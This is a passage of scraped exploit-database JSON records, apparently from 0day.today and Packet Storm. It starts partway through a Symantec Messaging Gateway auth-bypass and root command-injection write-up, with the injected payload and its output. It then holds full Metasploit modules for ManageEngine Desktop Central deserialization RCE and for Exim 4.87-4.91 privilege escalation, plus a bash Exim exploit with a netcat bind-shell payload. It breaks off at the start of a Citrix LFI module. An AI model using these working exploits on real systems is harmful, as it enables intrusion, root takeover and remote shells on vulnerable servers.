public method.\r\n \r\nOne such public method which will be the target of our authentication\r\nbypass is called `LoginAction.notificationLogin`.\r\n \r\nIt does the following:\r\n \r\n1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`\r\n2. Creates a new `UserTO` object using the decrypted `notify` parameter as\r\nan email value\r\n3. Creates a new session, invalidating the old one if necessary\r\n4. Sets the `user` attribute of the newly created session to our\r\nconstructed UserTO object\r\n \r\nIt essentially takes a username value from a GET parameter and logs you in\r\nas this user if it exists. If not, it creates this user for you.\r\n \r\nWe need to encrypt our `notify` argument so that\r\n`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the\r\nencryption is just PBEWithMD5AndDES using a static password, conveniently\r\nincluded in the code itself. I won't include the encryption password or a\r\nfully encrypted notify string in this post.\r\n \r\n \r\nExample request:\r\n \r\nGET\r\n/brightmail/action1.do?method=notificationLogin¬ify=MTIzNDU2Nzg%3d6[...]&id=test\r\nHTTP/1.1\r\n...\r\n \r\n \r\nHTTP/1.1 302 Found\r\nServer: Apache-Coyote/1.1\r\n...\r\nSet-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail;\r\nSecure; HttpOnly\r\n \r\n \r\n- Bug #2: Command injection\r\n \r\nThe RestoreAction.performRestore method can be reached with an\r\nauthenticated session and it takes the restoreSource and\r\nlocalBackupFilename parameters.\r\n \r\nAfter a long chain of function calls, localBackupFilename ends up being\r\nsent to the local \"bmagent\" daemon listening on port 41002. It will execute\r\n/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied\r\nvalue.\r\n \r\nThe db-restore script is a sudo wrapper for\r\n/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl\r\nscript containing a command injection in a call to /usr/bin/du.\r\n \r\n$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;\"`id`\";'\r\n/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory\r\nsh: uid=0(root) gid=0(root) groups=0(root): command not found\r\nERROR: Failed to copy 'asdf;\"`id`\";' from local backup store: No such file\r\nor directory\r\n \r\n \r\nThis command injection can be exploited from the web management interface\r\nwith a valid session, which we can create using bug #1.\r\n \r\n- Combining bug #1 and #2\r\n \r\nThe last step is to get a CSRF token since the vulnerable performRestore\r\nfunction is annotated with @CSRF.\r\n \r\nAfter some quick digging it turns out that all you need to do is call\r\n/brightmail/common.jsp to get a token that will be valid for all your\r\nrequests.\r\n \r\nThe URL-encoded value we provide for the `localBackupFileSelection`\r\nparameter is:\r\nasdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname\r\n-a>>/data/bcc/webapps/brightmail/output.txt`hehehe\r\n \r\nRequest:\r\n \r\nGET\r\n/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65\r\nHTTP/1.1\r\nHost: 192.168.205.220\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)\r\nGecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nCookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\nResponse:\r\n \r\nHTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nCache-Control: no-store,no-cache\r\nPragma: no-cache\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Type: text/html;charset=UTF-8\r\nContent-Length: 803\r\nDate: Thu, 29 Jun 2017 06:48:12 GMT\r\nConnection: close\r\n \r\n<HTML>\r\n<title>Symantec Messaging Gateway -&nbps;Restore</title>\r\n...\r\n \r\n \r\nNow to confirm that our command output was correctly placed in a file\r\ninside the webroot.\r\n \r\nimac:~% curl -k https://192.168.205.220/brightmail/output.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13\r\n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n \r\n=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT\r\n \r\nimac:~/brightmail% python brightmail-rce.py\r\nhttps://192.168.205.220/brightmail\r\nbypassing login..\r\n* JSESSIONID=693079639299816F80016123BE8A0167\r\nverifying login bypass..\r\n* Version: 10.6.3\r\ngetting csrf token..\r\n* 1e35af8c567d3448a65c8516a835cec30b6b8b73\r\ndone, verifying..\r\n \r\nuid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root)\r\ngroups=0(root),99(nobody),499(mysql),502(bcc)\r\nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13\r\n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n \r\n# cat /etc/issue\r\n \r\nSymantec Messaging Gateway\r\nVersion 10.6.3-2\r\nCopyright (c) 1998-2017 Symantec Corporation. All rights reserved.\r\n \r\n \r\n=*=*=*=*=*=*=*=*= REFERENCES\r\n \r\n[1]\r\nhttps://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00\r\n \r\n=*=*=*=*=*=*=*=*= CREDIT\r\n \r\nPhilip Pettersson\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/28326", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-12-22T13:22:19", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of that,\n the complete fix for the remote code execution vulnerability is now\n available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n ],\n ['Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ],\n ['PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 8383,\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'CmdStagerFlavor' => 'certutil', # This works without issue\n 'Notes' => {\n 'PatchedVersion' => Gem::Version.new('100474'),\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target is not responding to check')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central')\n end\n\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless version\n return CheckCode::Detected('Could not detect Desktop Central version')\n end\n\n vprint_status(\"Detected Desktop Central version #{version}\")\n\n if Gem::Version.new(version) < notes['PatchedVersion']\n return CheckCode::Appears(\"#{version} is an exploitable version\")\n end\n\n CheckCode::Safe(\"#{version} is not an exploitable version\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\n 'vars_get' => {'img' => '\\\\logger.zip'}\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-26T22:37:22", "description": "This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T00:00:00", "type": "zdt", "title": "Exim 4.87 / 4.91 - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "1337DAY-ID-33150", "href": "https://0day.today/exploit/description/33150", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'expect'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\r\n Improper validation of recipient address in deliver_message()\r\n function in /src/deliver.c may lead to command execution with root privileges\r\n (CVE-2019-10149).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and PoC (@qualys)\r\n 'Dennis Herrmann', # Working exploit (@dhn)\r\n 'Marco Ivaldi', # Working exploit (@0xdea)\r\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\r\n ],\r\n 'DisclosureDate' => '2019-06-05',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [\r\n 'Exim 4.87 - 4.91',\r\n lower_version: Gem::Version.new('4.87'),\r\n upper_version: Gem::Version.new('4.91')\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependSetgid' => true,\r\n 'PrependSetuid' => true\r\n },\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-10149' ],\r\n [ 'EDB', '46996' ],\r\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\r\n ]\r\n ))\r\n\r\n register_options(\r\n [\r\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\r\n OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def encode_command(cmd)\r\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\r\n end\r\n\r\n def open_tcp_connection\r\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\r\n params = Rex::Socket::Parameters.new({\r\n 'PeerHost' => '127.0.0.1',\r\n 'PeerPort' => datastore['EXIMPORT']\r\n })\r\n begin\r\n socket = socket_subsystem.create_tcp_client_channel(params)\r\n rescue => e\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n raise e\r\n end\r\n return socket_subsystem, socket\r\n end\r\n\r\n def inject_payload(payload)\r\n if session.type == 'meterpreter'\r\n socket_subsystem, socket = open_tcp_connection\r\n\r\n tcp_conversation = {\r\n nil => /220/,\r\n 'helo localhost' => /250/,\r\n \"MAIL FROM:<>\" => /250/,\r\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\r\n 'DATA' => /354/,\r\n 'Received:' => nil,\r\n '.' => /250/\r\n }\r\n\r\n begin\r\n tcp_conversation.each do |line, pattern|\r\n Timeout.timeout(datastore['SendExpectTimeout']) do\r\n if line\r\n if line == 'Received:'\r\n for i in (1..31)\r\n socket.puts(\"#{line} #{i}\\n\")\r\n end\r\n else\r\n socket.puts(\"#{line}\\n\")\r\n end\r\n end\r\n if pattern\r\n socket.expect(pattern)\r\n end\r\n end\r\n end\r\n rescue Rex::ConnectionError => e\r\n fail_with(Failure::Unreachable, e.message)\r\n rescue Timeout::Error\r\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\r\n ensure\r\n socket.puts(\"QUIT\\n\")\r\n socket.close\r\n socket_subsystem.shutdown\r\n end\r\n else\r\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\r\n \"&& echo true\").chomp.to_s == 'true'\r\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\r\n end\r\n\r\n bash_script = %|\r\n #!/bin/bash\r\n\r\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in $(seq 1 30); do\r\n echo 'Received: $i' >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n |\r\n\r\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@bash_script_path, bash_script)\r\n register_file_for_cleanup(@bash_script_path)\r\n chmod(@bash_script_path)\r\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\r\n end\r\n\r\n print_status('Payload sent, wait a few seconds...')\r\n Rex.sleep(5)\r\n end\r\n\r\n def check_for_bash\r\n unless command_exists?('/bin/bash')\r\n fail_with(Failure::NotFound, 'bash not found')\r\n end\r\n end\r\n\r\n def on_new_session(session)\r\n super\r\n\r\n if session.type == 'meterpreter'\r\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\r\n session.fs.file.rm(@payload_path)\r\n else\r\n session.shell_command_token(\"rm -f #{@payload_path}\")\r\n end\r\n end\r\n\r\n def check\r\n if session.type == 'meterpreter'\r\n begin\r\n socket_subsystem, socket = open_tcp_connection\r\n rescue\r\n return CheckCode::Safe\r\n end\r\n res = socket.gets\r\n socket.close\r\n socket_subsystem.shutdown\r\n else\r\n check_for_bash\r\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\r\n \"(read -u 3 && echo $REPLY) || echo false'\")\r\n if res == 'false'\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n if res =~ /Exim ([0-9\\.]+)/i\r\n version = Gem::Version.new($1)\r\n vprint_status(\"Found exim version: #{version}\")\r\n if version >= target[:lower_version] && version <= target[:upper_version]\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\r\n end\r\n end\r\n\r\n unless writable?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\r\n end\r\n\r\n if nosuid?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\r\n end\r\n\r\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\r\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\r\n 'to get root privileges.')\r\n end\r\n\r\n if session.type == 'shell'\r\n check_for_bash\r\n end\r\n\r\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@payload_path, payload.encoded_exe)\r\n register_file_for_cleanup(@payload_path)\r\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\r\n \"chmod 4755 #{@payload_path}'\"))\r\n\r\n unless setuid?(@payload_path)\r\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\r\n end\r\n\r\n cmd_exec(\"#{@payload_path} & echo \")\r\n end\r\nend\n\n# 0day.today [2021-09-27] #", "sourceHref": "https://0day.today/exploit/33150", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-18T13:57:26", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2019-06-17T00:00:00", "type": "zdt", "title": "Exim 4.91 Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "1337DAY-ID-32869", "href": "https://0day.today/exploit/description/32869", "sourceData": "#!/bin/bash\r\n\r\n#\r\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\r\n# Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \r\n# Improper validation of recipient address in deliver_message() \r\n# function in /src/deliver.c may lead to remote command execution.\r\n# (CVE-2019-10149)\r\n#\r\n# This is a local privilege escalation exploit for \"The Return \r\n# of the WIZard\" vulnerability reported by the Qualys Security \r\n# Advisory team.\r\n#\r\n# Credits:\r\n# Qualys Security Advisory team (kudos for your amazing research!)\r\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\r\n#\r\n# Usage (setuid method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m setuid\r\n# Preparing setuid shell helper...\r\n# Delivering setuid payload...\r\n# [...]\r\n# Waiting 5 seconds...\r\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Usage (netcat method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m netcat\r\n# Delivering netcat payload...\r\n# Waiting 5 seconds...\r\n# localhost [127.0.0.1] 31337 (?) open\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Vulnerable platforms:\r\n# Exim 4.87 - 4.91\r\n#\r\n# Tested against:\r\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\r\n#\r\n\r\nMETHOD=\"setuid\" # default method\r\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\r\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\r\n\r\n# usage instructions\r\nfunction usage()\r\n{\r\n echo \"$0 [-m METHOD]\"\r\n echo\r\n echo \"-m setuid : use the setuid payload (default)\"\r\n echo \"-m netcat : use the netcat payload\"\r\n echo\r\n exit 1\r\n}\r\n\r\n# payload delivery\r\nfunction exploit()\r\n{\r\n # connect to localhost:25\r\n exec 3<>/dev/tcp/localhost/25\r\n\r\n # deliver the payload\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"rcpt to:<$PAYLOAD>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in {1..31}\r\n do\r\n echo \"Received: $i\" >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n}\r\n\r\n# print banner\r\necho\r\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\r\necho 'Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>'\r\necho\r\n\r\n# parse command line\r\nwhile [ ! -z \"$1\" ]; do\r\n case $1 in\r\n -m) shift; METHOD=\"$1\"; shift;;\r\n * ) usage\r\n ;;\r\n esac\r\ndone\r\nif [ -z $METHOD ]; then\r\n usage\r\nfi\r\n\r\n# setuid method\r\nif [ $METHOD = \"setuid\" ]; then\r\n\r\n # prepare a setuid shell helper to circumvent bash checks\r\n echo \"Preparing setuid shell helper...\"\r\n echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\r\n gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\r\n if [ $? -ne 0 ]; then\r\n echo \"Problems compiling setuid shell helper, check your gcc.\"\r\n echo \"Falling back to the /bin/sh method.\"\r\n cp /bin/sh /tmp/pwned\r\n fi\r\n echo\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_SETUID\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n ls -l /tmp/pwned\r\n /tmp/pwned\r\n\r\n# netcat method\r\nelif [ $METHOD = \"netcat\" ]; then\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_NETCAT\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n nc -v 127.0.0.1 31337\r\n\r\n# print help\r\nelse\r\n usage\r\nfi\n\n# 0day.today [2019-06-18] #", "sourceHref": "https://0day.today/exploit/32869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-11-13T16:27:53", "description": "", "cvss3": {}, "published": "2020-11-13T00:00:00", "type": "packetstorm", "title": "Citrix ADC NetScaler Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-11-13T00:00:00", "id": "PACKETSTORM:160047", "href": "https://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Auxiliary::Scanner \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)', \n'Description' => %{ \nThe remote device is affected by multiple vulnerabilities. \n \nAn authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. \nAn unauthenticated remote attacker with access to the `NSIP/management interface` can exploit \nthis to bypass authorization (CVE-2020-8193). \n \nAnd Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which. \n}, \n'Author' => [ \n'Donny Maasland', # Discovery \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise) \n], \n'References' => [ \n['CVE', '2020-8193'], \n['CVE', '2020-8195'], \n['CVE', '2020-8196'], 